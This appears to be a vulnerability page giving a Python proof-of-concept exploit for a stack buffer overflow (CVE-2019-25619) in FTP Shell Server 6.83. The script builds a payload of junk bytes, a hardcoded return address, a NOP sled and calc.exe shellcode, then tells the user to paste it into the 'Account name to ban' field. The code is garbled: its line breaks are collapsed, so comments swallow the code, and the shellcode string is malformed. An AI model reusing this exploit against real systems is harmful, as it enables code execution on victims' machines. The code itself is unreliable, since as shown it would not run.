CVE-2019-25619 FTP Shell Server缓冲区溢出漏洞

#!/usr/bin/env python3 # PoC for CVE-2019-25619 # This script demonstrates the buffer overflow vulnerability in FTP Shell Server 6.83 # Target: 'Account name to ban' field in Manage FTP Accounts dialog import struct # Payload construction pattern: [Junk] + [Ret Addr] + [NOP Sled] + [Shellcode] # Offset to overwrite EIP (Example value, requires debugging to verify exact offset) offset = 4104 # Return address (Example: JMP ESP or POP POP RET) # This address varies based on OS version and loaded modules ret_addr = struct.pack('<L', 0x7C86467B) # NOP sled (No Operation) nop_sled = b'\x90' * 32 # Shellcode: Executes calc.exe (Windows) # This is a standard metasploit windows/exec calc payload shellcode = b"" \x31\xc9\x51\x68\x63\x61\x6c\x63\x54\xb8\xc7\x93\xc2\x77\xff\xd0\xb8\x90\x1e\xc2\x77\xff\xd0 """ # Construct the full payload payload = b'A' * offset + ret_addr + nop_sled + shellcode try: with open('CVE-2019-25619_PoC.txt', 'wb') as f: f.write(payload) print(f"[+] Payload generated successfully. Length: {len(payload)} bytes") print("[+] Copy the content of CVE-2019-25619_PoC.txt and paste it into the 'Account name to ban' field.") except Exception as e: print(f"[-] Error generating payload: {e}")